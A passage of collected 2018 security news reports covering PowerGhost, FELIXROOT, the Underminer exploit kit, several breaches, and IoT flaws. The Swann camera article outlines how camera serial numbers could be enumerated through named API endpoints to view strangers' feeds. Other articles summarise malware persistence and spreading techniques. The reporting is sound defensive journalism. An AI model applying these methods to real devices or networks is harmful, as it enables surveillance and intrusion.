Google did not reveal the price for Titan Security Keys, but rumors say it will be available for around $20 or $30.

The Titan keys will be compatible with major browsers (i.e Chrome, Firefox, and Opera) and many online services, including Dropbox, Facebook, Github.


Fileless PowerGhost cryptocurrency miner leverages EternalBlue exploit to spread
31.7.2018 securityaffairs Cryptocurrency

Security experts from Kaspersky Lab have spotted a new cryptocurrency miner dubbed PowerGhost that can spread leveraging a fileless infection technique.
The PowerGhost miner targets large corporate networks, infecting both workstations and servers, it employing multiple fileless techniques to evade detection.

“The malware, which we dubbed PowerGhost, is capable of stealthily establishing itself in a system and spreading across large corporate networks infecting both workstations and servers.” reads the analysis published by Kaspersky.

“This type of hidden consolidation is typical of miners: the more machines that get infected and the longer they remain that way, the greater the attacker’s profits. Therefore, it’s not uncommon to see clean software being infected with a miner; the popularity of the legitimate software serves to promote the malware’s proliferation.”

The PowerGhost leverages the NSA-linked EternalBlue exploit to spread, it is obfuscated PowerShell script containing malware’s core code, along with many other add-on modules such as the miner, miner libraries, the Mimikatz post-exploitation too, a module for reflective PE injection, and a shellcode for the EternalBlue exploit.

The victim system is infected remotely using exploits or remote administration tools (Windows Management Instrumentation), experts discovered that during the infection phase a one-line PowerShell script is executed to drop the core of the miner component and execute it, the entire process in the memory of the system.

The first thing that the malware does it to check the command and control (C&C) server and, if a new version is available, it downloads and executes it.

Then the malware uses the Mimikatz tool to get the user account credentials from the machine and use it to attempt lateral movements inside the target network.

“Propagation.With the help of mimikatz, the miner obtains the user account credentials from the current machine, uses them to log on and attempts to propagate across the local network by launching a copy of itself via WMI. By “a copy of itself” here and below we mean the one-line script that downloads the miner’s body from the C&C.” continues the analysis.

“PowerGhost also tries to spread across the local network using the now-notorious EternalBlue exploit (CVE-2017-0144).”

Once infected a machine, the PowerGhost attempts to escalate privileges by using various exploits such as the one for CVE-2018-8120.

In order to establish a foothold in the infected system, the PowerGhost saves all the modules as properties of a WMI class, while miner main body is saved as a one-line PowerShell script in a WMI subscription that activates every 90 minutes.

The script executes the miner by loading a PE file via reflective PE injection.

Most of the PowerGhost infections were observed in India, Brazil, Columbia, and Turkey.

PowerGhost

Experts discovered also a PowerGhost version that implements DDoS capability, a circumstance that leads Kaspersky into believing that authors attempted to create a DDoS-for-hire service.

Further details, including Indicators of Compromise (IoCs) are reported in the analysis published by Kaspersky.


Stealthy Crypto-Miner Has Worm-Like Spreading Mechanism
30.7.2018 securityweek Cryptocurrency

The PowerGhost crypto-miner is capable of remaining undetected on infected systems, and can spread on its own by leveraging a fileless infection technique, Kaspersky Lab has discovered.

The miner is targeting both workstations and servers, which allows it to spread across large corporate networks. The threat, Kaspersky discovered, leverages the National Security Agency-linked EternalBlue exploit to spread.

The new threat proves once again that the growing popularity and rates of cryptocurrencies have determined cyber-criminals to adopt ingenious mining techniques and to gradually drop ransomware Trojans as the malware of choice in favor of crypto-miners.

PowerGhost is an obfuscated PowerShell script containing not only the malware’s core code, but also a series of add-on modules such as the miner and libraries required for the miner’s operation, Mimikatz, a module for reflective PE injection, and a shellcode for the EternalBlue exploit.

By employing multiple fileless techniques, the malware remains inconspicuous to the user and undetected by antivirus technologies, Kaspersky notes.

During infection, which is performed via exploits or remote administration tools (Windows Management Instrumentation), a one-line PowerShell script is executed to drop the miner’s body and immediately launch it, without writing it to the hard drive.

After that, the script, which is PowerGhost itself, checks the command and control (C&C) server and, if a new version is available, it fetches and runs it.

Mimikatz is used to get the user account credentials from the machine. Then, the malware logs on and attempts propagation on the local network by launching a copy of the initial script via WMI. The threat also attempts to spread leveraging the EternalBlue exploit (CVE-2017-0144).

After using Mimikatz and WMI to spread to a new machine, the malware also attempts to escalate privileges on the newly infected system using various exploits (including one for CVE-2018-8120).

All modules are saved as properties of a WMI class, while the miner’s body is saved as a one-line PowerShell script in a WMI subscription that activates every 90 minutes. The miner is launched via reflective PE injection.

One PowerGhost version also included the ability to launch distributed denial of service (DDoS) attacks, likely because its authors attempted to make extra money by offering DDoS services.

This DDoS function is the only one that copies files to the hard drive and Kaspersky's security researchers believe it will be replaced with a fileless implementation in a future version of the malware. The researchers believe the DDoS function was added to the malware, because it is launched in a peculiar manner, where the DDoS module and a function to launch it are downloaded and saved to the disk separately.

To date, PowerGhost was mainly observed within corporate local area networks and has been mainly encountered in India, Brazil, Columbia, and Turkey.


State of Email Security: What Can Stop Email Threats?
30.7.2018 securityweek Security

Neither Current Technology Nor Security Awareness Training Will Stop Email Threats

A survey of 295 professionals -- mostly but not entirely IT professionals -- has found that 85% of respondents see email threats bypass email security controls and make it into the inbox; 40% see weekly threats; and 20% have to take significant remediation action on a weekly basis.

Email security firm GreatHorn wanted to examine the state of email security today, nearly fifty years after email was first developed. Its findings (PDF) will not surprise security professionals. Breach analyses regularly conclude that more than 90% of all breaches start with an email attack. Indeed, the GreatHorn research shows that the majority (54.4%) of corporate security leaders (that is, those who hold the CISO role) consider email security to be a top 3 security priority.

What is surprising is not that email security is failing (almost half -- 46.1% -- of all respondents said they were less than 'satisfied' with their current email security solution), but the discrepancy in threat perception between the security professional respondents (comprising 61% of the sample) and the non-security respondents (the laypeople, comprising 39% of the sample).

"Sixty-six percent of all the people we interviewed said the only threat they saw in their inbox was spam," GreatHorn's CEO and co-founder Kevin O'Brien told SecurityWeek. "I suspect there is a little bit of a confluence of different things in this figure, and that when they say 'spam', they don't only mean unsolicited marketing emails. Nevertheless, it is a dismissal of the severity of the risk that email poses."

This figure changes dramatically when asked of the security professionals among the respondents. "When you narrow the interview stats to security professionals, less than 16% said that spam was the main threat they faced," he continued. "So, you have 85% of all security teams saying that there is a wide range of different kinds of threats that come in every single day via email -- but to the lay user, the only thing that ever goes wrong is that you get some email you don't want."

O'Brien also quoted statistics from Gartner email specialist Neil Wynne: "The email open rate for the average white-collar professional within the bounds of their work email is 100%," said O'Brien. "Whether or not you take any action in response to it, you will open the email."

It is true that you can open a malicious email and take no action whatsoever and you will remain safe. But that clearly doesn't happen. GreatHorn's figures show that 20% of the security professional respondents are forced into direct remediation from email threats (such as suspending compromised accounts, PowerShell scripts, resetting compromised third-party accounts, etc).

The implication, at a simplistic level, is that the average non-security member of staff is highly likely to open all emails; is not likely to expect anything other than spam (31% of the laypeople respondents said they never saw any email threats other than spam); and clearly -- from empirical proof -- will too often click on a malicious link or open a weaponized attachment.

Asked if a further implication from these figures is that security awareness training is failing, O'Brien said, "Yes." There are qualifications to this response, because phish training companies' built-in metrics clearly demonstrate an improvement in the click-thru rates for users trained with their systems. Reductions in successful phishing from a 30% success rate to just 10% is not uncommon.

But, said O'Brien, "Verizon has reported that one in 25 people click on any given phishing attack." This suggests that for every 100 members of staff targeted by a phishing email, four will become victims -- and only one is necessary for a breach to occur.

The difficulty is the nature of modern email attacks. Many involve some form of impersonation, including BEC attacks, business spoofing attacks, and pure social engineering attacks from a colleague whose credentials have been acquired by the attacker. "You cannot train people to have awareness of an email threat when information about that threat is not visible to the user. There is very little functional way to train a user to differentiate between an email from a colleague and an email from someone who has stolen the colleague's credentials. So, we have a security awareness market that has used marketing to say that email security is an awareness problem, a people problem, and that you can train your way out of it. You cannot."

He added, "The reason that security awareness training companies are successful is because awareness training represents a tick in a compliance box that clears a company of gross negligence in the event they suffer a data breach." So, despite the fact it isn't really effective, you still need to do it.

GreatHorn's own view of the problem is that the solution must come from not just technology, nor simply people, but from using technology against the social engineering aspect of the threat -- that is, the content as well as the mechanics of the email.

Belmont, Mass-based GreatHorn announced a $6.3 million Series A funding round led by Techstars Venture Capital Fund and .406 Ventures in June 2017. It brings machine-learning technology to the continuing threat and problem of targeted spear phishing and the related BEC threat -- the latter of which, according to the FBI in May 2016, is responsible for losses "now totaling over $3 billion."


Office Vulnerabilities Chained to Deliver Backdoor
30.7.2018 securityweek
Vulnerebility  Virus

A recently observed malicious campaign is abusing two chained Office documents, each exploiting a different vulnerability, to deliver the FELIXROOT Backdoor, FireEye reports.

The attack starts with a lure RTF document claiming to contain seminar information on environmental protection. When opened, it attempts to exploit CVE-2017-0199 to download a second stage payload, which is a file weaponized with CVE-2017-11882 (the Equation Editor vulnerability).

Upon successful infection, the FELIXROOT loader component is dropped onto the victim’s machine, along with an LNK file that points to %system32%\rundll32.exe. The LNK file, which contains the command to execute the loader component of FELIXROOT, is moved to the startup directory.

The embedded backdoor component, which is encrypted using custom encryption, is decrypted and loaded directly in memory. The malware has a single exported function.

Upon execution, the backdoor sleeps for 10 minutes, then it checks to see if it was launched by RUNDLL32.exe along with parameter #1. If so, it performs an initial system triage before launching command and control (C&C) network communications.

In addition to gathering a variety of system information, the malware also reads registry entries for potential administration escalation and proxy information.

Based on received commands, the backdoor can fingerprint the infected machine, drop a file and execute it, launch remote shell, terminate connection to the C&C, download and run batch script, download file, and upload file.

Communication with the C&C server is performed over HTTP and HTTPS. Sent data is encrypted using AES encryption and arranged in a custom structure.

The malware contains several commands for specific tasks. Once it has executed all tasks, it clears all the footprints from the targeted machine, by deleting the LNK file, created registry keys, and the dropper components.

“CVE-2017-0199 and CVE-2017-11882 are two of the more commonly exploited vulnerabilities that we are currently seeing. Threat actors will increasingly leverage these vulnerabilities in their attacks until they are no longer finding success, so organizations must ensure they are protected,” FireEye notes.


DMARC Fully Implemented by Half of U.S. Government Agencies
30.7.2018 securityweek
Spam

More than half of U.S. government agencies have fully implemented the DMARC email security standard in response to a binding operational directive from the Department of Homeland Security, according to email threat protection company Agari.

The DHS issued the Binding Operational Directive (BOD) 18-01 in mid-October 2017, instructing all federal agencies to make plans and start using web and email security technologies such as HTTPS, STARTTLS and DMARC.

DMARC (Domain-based Message Authentication, Reporting and Conformance) is an email authentication, policy, and reporting protocol designed to detect and prevent email spoofing. Organizations can set the DMARC policy to “none” to only monitor unauthenticated emails, “quarantine” to send them to the spam or junk folder, or “reject” to completely block their delivery.

Agencies were given one year to fully implement DMARC (i.e. set their DMARC policy to “reject”).

Agari has been monitoring more than 1,000 government domains to check their status. Shortly after the DHS issued the BOD, only 18% had implemented at least a minimal DMARC policy. By December 2017, nearly half had rolled out DMARC, but only 16% had set a “quarantine” or “reject” policy.

Agari’s latest report shows that 922 government-owned domains, representing 81% of the total, had enabled DMARC as of July 15. Nearly 600, representing 52%, have set a “reject” policy.

DMARC status in U.S. federal agencies

While this may seem like significant progress, Agari pointed out that two-thirds of the domains with a “reject” policy are “defensive domains,” which are not configured for sending email.

“Moving defensive domains to a DMARC enforcement policy is generally an easier process than moving active domains that send email, and also need to account for 3rd parties sending email on the agency’s behalf as well as specific mail servers permitted to send email,” Agari said in its report.

The company has determined that 28 agencies have fully protected all their domains. Some government organizations still have some unprotected assets, but they have secured a significant number of domains.

For example, the Department of Health and Human Services has enabled DMARC with a “reject” policy on 92 of its 118 domains, while the Department of Justice has done so for 65 of its 75 domains.

“To fully reach compliance with BOD 18-01, and to protect the federal government from phishing attacks, many more executive branch agencies must still implement ‘p=reject.’ But in comparison to the private sector, the U.S. Government should serve as a shining example for the implementation of common security standards,” Agari said.


KICKICO security breach – hackers stole over $7.7 million worth of KICK tokens
30.7.2018 securityaffairs Incindent

ICO platforms are becoming a privileged target for hackers, the last victim in order of time is KickICO, a Blockchain crowdfunding website for ICO.
On Friday, KickICO disclosed a security breach, according to the platform attackers accessed to its wallets and stole over 70 million KICK tokens (roughly $7.7 million at the time).

The incident occurred on July 26, at 09:04 UTC, KickICO CEO Anti Danilevski explained that its staff learned of the security breach from victims who complained to it.

KICKICO hack

“On July 26 at 9:04 (UTC) KICKICO has experienced a security breach, which resulted in the attackers gaining access to the account of the KICK smart contract — tokens of the KICKICO platform. The team learned about this incident after the complaints of several victims, who did not find tokens worth 800 thousand dollars in their wallets.” reads the data breach notification published by the company.

As of Friday, the company announced the situation was under control and the smart contract has been restored. KickICO announced it will return all stolen KICK tokens to their legitimate owners, for this reason, it invited them to connect via email report@kickico.com.

“KICKICO guarantees to return all tokens to KickCoin holders. We apologize for the inconveniences,” Danilevski said.

The company quickly started an investigation on the security breach, the internal staff discovered that the attackers managed to gain access to the private key of the KickICO platform used by the developers to manage the KICK token smart contract.

Once obtained the key, the attackers used it to destroy KICK tokens at approximately 40 addresses and created the same amount of tokens at other 40 wallets he was controlling. Using this trick the overall number of tokens hasn’t changed and security measures in place were not able to detect the fraudulent activity.

“The hackers gained access to the private key of the owner of the KickCoin smart contract. In order to hide the results of their activities, they employed methods used by the KickCoin smart contract in integration with the Bancor network: hackers destroyed tokens at approximately 40 addresses and created tokens at the other 40 addresses in the corresponding amount. In result, the total number of tokens in the network has not changed. ” continues the notification.

Fortunately, the community quickly discovered the security breach and helped the platform to mitigate it. KICKICO quickly responded and prevented further losses by replacing the compromised private key with another one associated with the cold storage.

Read more: https://cryptovest.com/news/kickico-suffered-77m-hack-attack-says-will-return-stolen-kicko-tokens/

“After the incident, the KICK token, listed on the 136th position on Coinmarketcap, has lost 1.87% in the last 24 hours. However, the move may be influenced by the bearish mood of the entire crypto market after the SEC rejected a Bitcoin ETF proposed by the Winklevoss twins.” reported the website cryptovest.com.


Massive Singapore Healthcare Breach Possibly Involved Contractor
30.7.2018 securityweek Incindent

Researchers have come across two Pastebin posts that could shed more light on the data breach that resulted in the health records of 1.5 million Singaporeans getting stolen by hackers.

Authorities in Singapore announced on July 20 that a sophisticated threat actor had gained unauthorized access to a database of SingHealth, the city-state’s largest group of healthcare institutions.

The incident, described as Singapore’s biggest ever data breach, resulted in personal information and details on medication becoming compromised, but authorities said medical records, clinical notes and financial information were not affected.

The attackers are said to have used a malware-infected computer to access a SingHealth database between June 27 and July 4.

Singapore officials suggested – and independent cybersecurity experts confirmed – that the attack was likely carried out by a state-sponsored threat group, but they have refrained from publicly speculating on who might be behind the operation.

Trustwave has been monitoring the incident and the security firm is also convinced that the attack was launched by a nation-state actor.

“At this point, Trustwave SpiderLabs is not assigning attribution to a specific threat actor. We have strong suspicion but do not feel we have enough information to confirm attribution,” the company said.

Over the weekend, Trustwave published a blog post detailing its analysis of two files published by unknown individuals on code and text storage website Pastebin. While they have not been able to confirm it, researchers believe these files are somehow linked to the SingHealth breach and noted that they could provide important clues about how the attackers gained access to the data.

One of the files, an exception log from a Java server, posted to Pastebin on May 24, shows a query for delegating access to a SingHealth Headquarters (SHHQ) database from a senior manager in the Medical Technology Office of Singapore’s Health Services to an employee of CTC, a major IT contractor.

The delegation request was set for June 9 - 17 and it could mean that the attacker had hijacked the contractor’s user account and leveraged it to manipulate the SingHealth database. These dates show that the hackers may have conducted at least some reconnaissance activities weeks earlier than what Singapore officials reported.

The log file also shows that the target was a database named portaldev. “It is conceivable that the development environment server was not as well protected as the production server and therefore was an easier target,” Trustwave researchers said.

The security firm also discovered a series of SQL queries, targeting SingHealth medical data, uploaded to Pastebin on June 15. These queries suggest that whoever executed them was looking for sensitive information.

While it’s possible that the files were uploaded to Pastebin by developers working on the SingHealth database, they may have also been posted by the attacker, possibly to share code with collaborators for troubleshooting purposes, Trustwave explained.

“While we cannot know for certain if these findings are directly related to the SingHealth compromise, the combination of suspicious items occurring directly within the attack window are highly suspicious,” researchers said.


FELIXROOT Backdoor is back in a new fresh spam campaign

30.7.2018 securityaffairs Virus  Spam

Security experts from FireEye have spotted a new spam campaign leveraging the FELIXROOT backdoor, a malware used for cyber espionage operation.
The FELIXROOT backdoor was first spotted by FireEye in September 2017, when attackers used it in attacks targeting Ukrainians.

The new spam campaign used weaponized documents claiming to provide information on a seminar on environmental protection efforts.

The documents include code to exploit known Microsoft Office vulnerabilities CVE-2017-0199 and CVE-2017-11882 to drop and execute the backdoor binary.

Experts reported that the lure documents used in the last campaign were written in the Russian language. The weaponized document exploits the CVE-2017-0199 flaw to download a second-stage payload that triggers the CVE-2017-11882 vulnerability to drop and execute the final backdoor.

“FireEye recently observed the same FELIXROOT backdoor being distributed as part of a newer campaign. This time, weaponized lure documents claiming to contain seminar information on environmental protection were observed exploiting known Microsoft Office vulnerabilities CVE-2017-0199 and CVE-2017-11882 to drop and execute the backdoor binary on the victim’s machine.” reads the analysis published by FireEye.

“After successful exploitation, the dropper component executes and drops the loader component. The loader component is executed via RUNDLL32.EXE. The backdoor component is loaded in memory and has a single exported function,”

The CVE-2017-0199 allows the attackers to download and execute a Visual Basic script containing PowerShell commands when the victim opens the lure document.

The CVE-2017-11882 is remote code execution vulnerability that allows the attacker to run arbitrary code in the context of the current user.

FELIXROOT backdoor

This backdoor implements a broad a range of features, including the target fingerprinting via Windows Management Instrumentation (WMI) and the Windows registry, remote shell execution, and data exfiltration.

Upon execution, the backdoor sleeps for 10 minutes, then it checks to see if it was launched by RUNDLL32.exe along with parameter #1.

If the backdoor was launched by RUNDLL32.exe with parameter #1 it makes an initial system triage before connecting to the command-and-control (C2). The malicious code uses Windows API to get the system information (i.e. computer name, username, volume serial number, Windows version, processor architecture and so on).

The FELIXROOT backdoor is able to communicate with its Command and Control server via HTTP and HTTPS POST protocols. The traffic to the C2 is encrypted with AES and converted into Base64.

“FELIXROOT communicates with its C2 via HTTP and HTTPS POST protocols. Data sent over the network is encrypted and arranged in a custom structure. All data is encrypted with AES, converted into Base64, and sent to the C2 server” continues the analysis.

“Strings in the backdoor are encrypt1ed using a custom algorithm that uses XOR with a 4-byte key.”

The experts believe that this backdoor is a dangerous threat but was involved at the time in massive campaigns.

FELIXROOT backdoor contains several commands that allow it to execute specific tasks. Once executed a command, the malicious code will wait for one minute before executing the next one.

“Once all the tasks have been executed completely, the malware breaks the loop, sends the termination buffer back, and clears all the footprints from the targeted machine” continues FireEye.

Deletes the LNK file from the startup directory.
Deletes the registry key HKCU\Software\Classes\Applications\rundll32.exe\shell\open
Deletes the dropper components from the system.
Further details, including the IoCs are reported in the analysis published by FireEye.


Underminer Exploit Kit spreading Bootkits and cryptocurrency miners
30.7.2018 securityaffairs Cryptocurrency

New Underminer exploit kit delivers a bootkit that infects the system’s boot sectors as well as a cryptocurrency miner dubbed Hidden Mellifera.
Malware researchers from Trend Micro have spotted a new exploit kit, tracked as Underminer exploit kit, delivering a bootkit that infects the system’s boot sectors as well as a cryptocurrency miner dubbed Hidden Mellifera.

“We discovered a new exploit kit we named Underminer that employs capabilities used by other exploit kits to deter researchers from tracking its activity or reverse engineering the payloads.” reads the analysis published by TrendMicro.

“Underminer delivers a bootkit that infects the system’s boot sectors as well as a cryptocurrency-mining malware named Hidden Mellifera.”

Researchers first noticed the Underminer Exploit activity on July 17 while it was distributing the payloads mainly to Asian countries, mostly in Japan (69,75%) and Taiwan (10,52%).

Underminer transfers the malicious payloads via an encrypted transmission control protocol (TCP) tunnel and packages malicious files with a customized format similar to ROM file system format (romfs). According to the experts, this makes it difficult to analyze the malicious code.

The Underminer exploit kit appears to have been created in November 2017 when it only included the code for the exploitation of Flash vulnerabilities and delivered fileless payloads to deliver and execute the malware.

The Underminer EK includes functionalities also employed by other exploit kits, including:

browser profiling and filtering;
preventing of client revisits;
URL randomization;
asymmetric encryption of payloads;
The EK redirect visitors to a landing page that profile and detect the user’s Adobe Flash Player version and browser type via user-agent.

In case the visitor’s profile does not match the one associated with a target of interest, the exploit kit will not deliver malicious content and redirect the visitor to a clean website.

The Underminer exploit kit also sets a token to the browser cookie, with this trick if the victim already accessed the landing page, it only delivers an HTTP 404 error message instead of payloads.

Researchers discovered that the Underminer exploit kit still includes a small number of exploits. The experts have spotted the code to trigger the following vulnerabilities:

CVE-2015-5119, a use-after-free vulnerability in Adobe Flash Player patched in July 2015.
CVE-2016-0189, a memory corruption vulnerability in Internet Explorer (IE) patched in May 2016.
CVE-2018-4878, a use-after-free vulnerability in Adobe Flash Player patched in February 2018.
All the above flaws have been exploited by other EKs in the past.

Below the infection flow of Underminer’s exploits described by Trend Micro.Underminer modus operandi

Underminer modus operandi

“Like other exploits before it, we expect Underminer to hone their techniques to further obfuscate the ways they deliver their malicious content and exploit more vulnerabilities while deterring security researchers from looking into their activities. And given the nature of their operations, we also expect them to diversify their payloads.” concludes Trend Micro.


Security bug in Swann IoT Camera allowed to access video feeds
30.7.2018 securityaffairs IoT

Security experts have discovered a security glitch in Swann IoT camera that could be exploited by attackers to access video feeds.
Security experts from Pen Test Partners (Andrew Tierney, Chris Wade and Ken Munro) along with security researchers Alan Woodward, Scott Helme and Vangelis Stykas have discovered a security glitch in Swann IoT camera that could be exploited to access video feeds.

The experts reported the issue to the vendor that has patched the vulnerability.

The research team developed a proof-of-concept attack exploiting security flaws in the cloud service used by the IoT camera, Safe by Swann, in this way they were able to access the cameras via their mobile devices.

The experts started investigating the issue after reading a BBC article outlining how a BBC employee had accidentally seen someone else’s footage on the mobile app for their home security camera.

The affected camera model it a battery-powered HD camera that implements video streaming feature either directly over the local network or via a cloud service.

Swann IoT camera

Experts noticed that the cloud service is provided by Ozvision, when a user logs into the system through Safe by Swann, a request is made (userListAssets) to the server.

The server, in turn, provides a list containing the devices associated with the account.

The researchers analyzed the requests and attempted to manipulate the serial number parameter.

Swann IoT camera request

The experts explained that it is easy to find a serial number associated with the targeted device via the API endpoint and APK.

“After reviewing the API endpoint and APK, I quickly realised that the serial number (swnxxxxxxxxx) is the primary identifier of the camera on the platform. This is both for the Swann-specific web API and the OzVision peer-to-peer tunnel. The serial is easily found in the mobile app:” states the analysis published by the experts.

“We replace the serial number (deviceid) in the response from the server. At this point the mobile app sees the details of someone else’s camera. We are using Charles here, but Burp or MITMproxy will do it too”

The experts demonstrated that it is possible to access the camera stream for another serial number.

“In the app, one simply presses ‘play’. This made a request to deviceWakeup using the modified serial, then the Ozvision tunnel to the device was established using the modified serial. We could then watch the camera live.” continues the experts.

The experts explained that Swann quickly fixed the issue, but they speculated that the Ozvision was already aware of the issue.

“Ozvision already knew about the vulnerability, as Swann had informed them. The Swann customer camera cloud environment had quickly been fixed. Swann took swift action to fix the flaw and had a constructive dialogue with us.” continues the post.

“We suspect they knew about this issue for about nine months, and only fixed it when pressured by Swann; and we are confident the vulnerability was present in at least one other major camera brand to which they provide a cloud service. Further, they initially deflected direct questions about the issue back to Swann.”

How to discover serial numbers of existing cameras?

The serial number if composed of the string ‘swn’ plus 9 hex chars. The researcher Vangelis (@evstykas of the Tapplock API vulnerability fame) analyzed the API and discovered that it was possible to enumerate them with the following request:

1.1/osn/deviceIsOwned

1.1/osn/AccountAddDevice – this will throw an error if the camera is already paired, this means that using this trick it is possible to enumerate the entire keyspace searching for existing cameras.

“We believe the keyspace could be fully enumerated in as little as 3 days, given a distributed set of concurrent requests to the API.” concluded the researchers.

“So, one could now access arbitrary cameras.”


Mysterious snail mail from China sent to US agencies includes Malware-Laden CD
30.7.2018 securityaffairs
Virus

Several U.S. state and local government agencies have reported receiving suspicious letters via snail mail containing malware-laden CD
Crooks and cyberspies attempt to exploit any attack vector to compromise the targeted computers and the case we are going to discuss demonstrate it.

The popular security expert Brian Krebs reported that several U.S. state and local government agencies have reported receiving suspicious letters via snail mail containing malware-laden compact discs (CDs).

The list of recipients that received the malicious snail mail includes State Archives, State Historical Societies, and a State Department of Cultural Affairs.

KrebsOnSecurity reported having learned that the strange mail is apparently sent from China.

“This particular ruse, while crude and simplistic, preys on the curiosity of recipients who may be enticed into popping the CD into a computer. According to a non-public alert shared with state and local government agencies by the Multi-State Information Sharing and Analysis Center (MS-ISAC), the scam arrives in a Chinese postmarked envelope and includes a “confusingly worded typed letter with occasional Chinese characters.”” reads the post published by Brian Krebs.

Snail Mail Malware-Laden CD

The attackers clearly attempt to exploit the curiosity of the potential victims that may be enticed into seeing the content of the CD.

According to the experts at MS-ISAC who analyzed the CDs, the media support contain Mandarin language Microsoft Word documents, some of which including malicious scripts.

All the letters received by the organizations appear to be addressed specifically to them.

“It’s not clear if anyone at these agencies was tricked into actually inserting the CD into a government computer.” continues Krebs.

“I’m sure many readers could think of clever ways that this apparent mail-based phishing campaign could be made more effective or believable, such as including tiny USB drives instead of CDs, or at least a more personalized letter that doesn’t look like it was crafted by someone without a mastery of the English language.”

A similar attack technique has been already observed in the wild, in September 2016 the Police in the Australian State of Victoria issued a warning to the local population of malware-laden USB drives left in letterboxes.

In August 2016, at Black Hat USA, the security researcher Elie Bursztein demonstrated the dangers of found USB drive and how to create a realistic one.

The expert dropped 297 USB drives on the University of Illinois Urbana-Champaign campus in six different locations, the devices are able to take over the PC of the unaware user that will find the key.

48 percent of USB drives were picked up by passers and plugged into a computer, and the unaware users also tried to open the file within.

Social engineering attacks demonstrate that humans are the weakest link in the security chain, and attacks leveraging malware-laden CD leverage bad habit.


Tens of flaws in Samsung SmartThings Hub expose smart home to attack
30.7.2018 securityaffairs
Vulnerebility  IoT

Cisco Talos researchers found tens of flaws in Samsung SmartThings Hub controller that potentially expose smart home devices to attack
Cisco Talos researchers have discovered 20 vulnerabilities in Samsung SmartThings Hub controller that potentially expose any supported third-party smart home devices to cyber attack.

“Cisco Talos recently discovered several vulnerabilities present within the firmware of the Samsung SmartThings Hub.” reads the analysis published by Talos.

“These vulnerabilities could allow an attacker to execute OS commands or other arbitrary code on affected devices.”

The Samsung SmartThings Hub is a central controller that could be used to manage a broad range of internet-of-things (IoT) devices in a smart home, including smart plugs, LED light bulbs, thermostats, and cameras.

The access to those IoT devices could allow attackers to gather sensitive information managed by the devices within the home and perform unauthorized activities.

Samsung SmartThings Hub runs a Linux-based firmware and allows for communications with various IoT devices using various wireless standards Zigbee, Z-Wave, and Bluetooth.

Talos researchers explained that in order to exploit the flaws, the attacker needs to chain a number of existing vulnerabilities together.

“It is possible to gather the set of preconditions needed to exploit bugs that would otherwise be unreachable by using multiple vulnerabilities.” researchers said.

“This is commonly referred to as “chaining.” When considering the severity of vulnerabilities, it is essential to keep in mind that they might be used as part of a chain, as this would significantly elevate their severity.”

The experts identified three notable chains, only one of them is a remote code execution (RCE) vulnerability that can be exploited without prior authentication.

RCE Chain – CVE-2018-3911

This RCE chain attack affects the “video core” HTTP server of the hub, it could be exploited by attackers to inject HTTP requests into this process from a network. The flaw is an exploitable HTTP header injection bug that exists within the communications (via Port 39500) between the hub and the remote servers. The flaw could be exploited by sending specially crafted HTTP requests to vulnerable devices.

“This vulnerability is present within the JSON processing performed by the `hubCore` binary present within the SmartThings hub and could be combined with other vulnerabilities present within affected devices to achieve code execution.” states the report.

Samsung SmartThings Hub

Other chains

Other chains identified by the researchers could be exploited only by an authenticated attacker.

The first attack chain is a remote code execution that could be obtained by exploiting the CVE-2018-3879 flaw that allows authorized attackers to execute SQL queries against a database running in the IoT device.

Experts noticed that chaining this flaw, with a string of other memory corruption vulnerabilities (CVE-2018-3880, CVE-2018-3906, CVE-2018-3912 to CVE-2018-3917, and CVE-2018-3919) that affects the Samsung SmartThings Hub it is possible to execute arbitrary code in the network.

Experts highlighted that the CVE-2018-3879 can also be exploited in the final chain attack for remote information leakage. This vulnerability can be used to create an empty file inside the device.

“Remote information leakage: TALOS-2018-0556 can also be used to create an empty file anywhere inside the device. As described in TALOS-2018-0593, the existence of an empty file at path “/hub/data/hubcore/stZigbee” will make the “hubCore” process to crash. Moreover, as described in TALOS-2018-0594, when the “hubCore” process crashes, it triggers an information leak that can be captured from the network.” reads the analysis tublished by Talos.

“By chaining these 3 vulnerabilities in order, an attacker can obtain a memory dump of the `hubCore` process, which contains most of the core logic, and consequent sensitive information, of the Hub.”

Talos experts tested and confirmed that the Samsung SmartThings Hub STH-ETH-250 – Firmware version 0.20.17 is affected by the flaws.

Samsung has addressed the flaw and security updates have been pushed out automatically.

“Talos recommends that these devices are updated as quickly as possible. As Samsung pushes updates out to devices automatically, this should not require manual intervention in most cases. It is important to verify the updated version has actually been applied to devices to ensure that they are no longer vulnerable. Samsung has released a firmware update that resolves these issues. An advisory related to these vulnerabilities can be found here.” concludes Talos.


Microsoft Uncovers Multi-Tier Supply Chain Attack
28.7.2018 securityweek Attack

Microsoft has shared details of a new attack that attempted to spread crypto-mining malware to a large number of users by compromising the software supplying partner of an application developer.

The multi-tier attack relied on compromising the shared infrastructure between a PDF editor vendor and one of its partners that provided additional font packages for the application: the attackers aimed at the supply chain of the supply chain.

Limited in nature, Microsoft said the compromise appeared to be active between January and March 2018, and could have impacted six other vendors working with the font package provider.

Carried out silently, the attack initially appeared as a typical infection and was automatically blocked, but the same infection pattern was observed across a large number of machines.

Windows Defender APT eventually alerted on nearly 70,000 cases incidents involving a coin mining process masquerading as pagefile.sys, which was launched by a service named xbox-service.exe, Microsoft’s Windows Defender ATP Research team explains.

Microsoft's investigation revealed that a malicious installer package (MSI) was being downloaded by a PDF editor during installation, along with other legitimate installers. It was then discovered that the application vendor itself hadn’t been compromised, but the malicious package was served by a partner that creates and distributes additional font packages used by the app.

The attackers discovered a weakness in the interactions between the app vendor and its partner and also found a way to leverage it to hijack the installation chain of the MSI font packages, thus turning the PDF editor into the unexpected carrier of the malicious payload.

Microsoft discovered that the attackers had created a replica of the software partner’s infrastructure on their own server and copied and hosted all MSI files, including font packages, there. They only modified an Asian fonts package to add the malicious payload to it.

The attackers also managed to influence the download parameters used by the PDF app so as to point to their server, which resulted in the download of MSI font packages from the rogue server. Thus, users ended up installing the coin miner malware along with the legitimate application.

At device restart, the malicious MSI file would be replaced with the legitimate version. Microsoft also discovered hardcoded PDF app names in the malicious package and concluded that at least six additional vendors might have been targeted by the attackers.

“While we were not able to find evidence that these other vendors distributed the malicious MSI, the attackers were clearly operating with a broader distribution plot in mind,” Microsoft says.

Detected as Trojan:Win64/CoinMiner, the malicious miner would hide behind the name xbox-service.exe and use the infected machine’s resources to mine for Monero. The malware also attempts to prevent remote cleaning and remediation by blocking communication with the update servers of certain PDF apps.

The threat also hinted at browser scripts as an alternative form of coin mining, but it’s unclear whether this was a secondary plan or work in progress.

“This new supply chain incident did not appear to involve nation-state attackers or sophisticated adversaries but appears to be instigated by petty cybercriminals trying to profit from coin mining using hijacked computing resources,” Microsoft’s says.

